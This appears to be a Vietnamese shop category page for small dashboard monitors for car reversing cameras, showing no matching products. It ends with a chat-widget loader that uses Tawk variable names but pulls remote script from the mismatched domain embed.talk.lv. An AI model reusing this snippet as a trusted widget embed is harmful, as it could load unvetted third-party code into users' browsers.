Màn Hình Taplo

Màn hình taplo dành cho ô tô là loại màn hình nhỏ, với kích thước từ 4inch đến 6inch. Màn hình này sẽ được lắp ở phía trong xe ô tô, dùng để hiển thị hình ảnh cho camera lùi hoặc camera tiến, camera gương. Đây là giải pháp cho các xe ô tô muốn lắp camera lùi nhưng chưa có màn hình DVD để hiển thị.

Không tìm thấy sản phẩm nào khớp với lựa chọn của bạn.

var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date(); (function(){ var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0]; s1.async=true; s1.src='https://embed.talk.lv/666d0cb9bc592c18a31f4fa4/1i0cvjdor'; s1.charset='UTF-8'; s1.setAttribute('crossorigin','*'); s0.parentNode.insertBefore(s1,s0); })();